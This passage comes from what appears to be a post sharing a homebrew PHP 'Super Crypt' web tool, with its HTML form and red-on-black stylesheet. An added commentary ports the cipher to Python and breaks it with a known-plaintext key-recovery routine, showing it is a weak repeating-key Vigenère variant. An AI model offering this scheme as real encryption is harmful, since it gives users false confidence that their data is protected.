Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header"><a href="Decoded.txt">Decoded Message</a></div>
</div>
</div>
</body>
</html>';
}
}
else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area"></textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
?>
///////////////////
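Stripped of the HTML, the PHP above is a repeating-key additive cipher: the key stream is the md5 hex digest of the password with duplicate characters removed (at most 16 symbols, all hex digits), each plaintext byte is added to the key character at the same position in its chunk, and the sum is written as a base-11 digit pair. The code below is an added example, not part of the post: a Python port of the encrypt and decrypt branches with the same key schedule, followed by a known-plaintext recovery that shows why a linear key stream of period at most 16 gives no protection. Function names and the test message are assumptions of this example.

```python
import hashlib

# Symbol table from the PHP switch: index == value mod 11
SYMBOLS = "<*$#+?>^!&%"
HEX = "0123456789abcdef"


def derive_key(key):
    """Same key schedule as the PHP: md5 hex digest with duplicate characters
    dropped (array_unique keeps first occurrences, in order)."""
    digest = hashlib.md5(key.encode()).hexdigest()
    return list(dict.fromkeys(digest))


def encrypt(message, key):
    """Port of the encrypt branch: each plaintext byte is added to the key
    character at the same position in the chunk, and the sum is written as
    (sum // 11) followed by SYMBOLS[sum % 11]."""
    k = derive_key(key)
    n = len(k)
    out = []
    for start in range(0, len(message), n):
        chunk = message[start:start + n]
        for i in range(n):
            # the PHP reads past the end of the last chunk and gets ord('') == 0
            c = ord(chunk[i]) if i < len(chunk) else 0
            s = ord(k[i]) + c
            out.append(f"{s // 11}{SYMBOLS[s % 11]}")
    return " ".join(out)


def _token_value(tok):
    return int(tok[:-1]) * 11 + SYMBOLS.index(tok[-1])


def decrypt(ciphertext, key):
    """Port of the decrypt branch: a value of 0 is padding and is skipped;
    chr() is masked to a byte the way PHP's chr() wraps out-of-range values."""
    k = derive_key(key)
    n = len(k)
    chars = []
    for idx, tok in enumerate(ciphertext.split(" ")):
        val = _token_value(tok) - ord(k[idx % n])
        if val != 0:
            chars.append(chr(val & 255))
    return "".join(chars)


def recover_key(ciphertext, known_prefix):
    """Known-plaintext attack. Every token is key[i % n] + plaintext[i], so
    token - plaintext is the key stream itself; n is the period of that
    stream and is at most 16 because the key is drawn from md5 hex digits.
    With 32 known characters two full periods are covered for any n, so the
    smallest period that fits is the real one. Returns the key list or None."""
    tokens = ciphertext.split(" ")
    stream = [_token_value(t) - ord(p) for t, p in zip(tokens, known_prefix)]
    for n in range(1, 17):
        periodic = all(stream[i] == stream[i + n] for i in range(len(stream) - n))
        candidate = [chr(v) if 0 <= v < 128 else "?" for v in stream[:n]]
        if periodic and all(c in HEX for c in candidate) and len(set(candidate)) == n:
            return candidate
    return None


if __name__ == "__main__":
    msg = "Attack at dawn, then regroup at the old mill before sunrise."
    ct = encrypt(msg, "hunter2")
    print("ciphertext :", ct)
    print("round trip :", decrypt(ct, "hunter2") == msg)
    print("real key   :", "".join(derive_key("hunter2")))
    print("recovered  :", "".join(recover_key(ct, msg[:32])))
```

Even without any known plaintext the scheme is weak: each key position takes one of only 16 values, so an attacker can try all 16 per position and keep the one that yields printable text, which is the classical Vigenère break. The encoding of sums as digit pairs, the symbol table and the chunking add no secrecy; they only make the ciphertext longer.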
style file (style.css)
///////////////////
html{
cursor: default;
}
body{
margin: 0px;
font-size: 14px;
color: #ff0000;
font-weight: bold;
background: #000000;
}
#main_container{
width: 500px;
margin-left: auto;
margin-right: auto;
}
#body_container{
width: 500px;
height: 600px;
position: relative;
top: 0px;
left: 0px;
}
#header{
height: 50px;
width: 498px;
background: #000000;
position: absolute;
top: 100px;
left: 0px;
padding-top: 5px;
padding-left: 0px;
padding-right: 0px;
padding-bottom: 0px;
font-size: 32px;
color: #ff0000;
text-align: center;
border: 1px solid #ff0000; 
}
#text_area{
height: 300px;
width: 500px;
border: 0px;
background: #ff0000;
position: absolute;
top: 160px;
left: 0px;
cursor: default;
font-size: 14px;
font-weight: bold;
}
#task{
width: 110px;
position: absolute;
top: 470px;
left: 0px;
background: #ff0000;
border: 0px; 
}
#button{
width: 110px;
position: absolute;
top: 470px;
left: 120px;
background: #ff0000;
border: 0px;
}
#key{
position: absolute;
top: 470px;
left: 255px;
}
#key_text{
width: 200px;
background: #ff0000;
position: absolute;
top: 470px;
right: 0px;
border: 0px;
}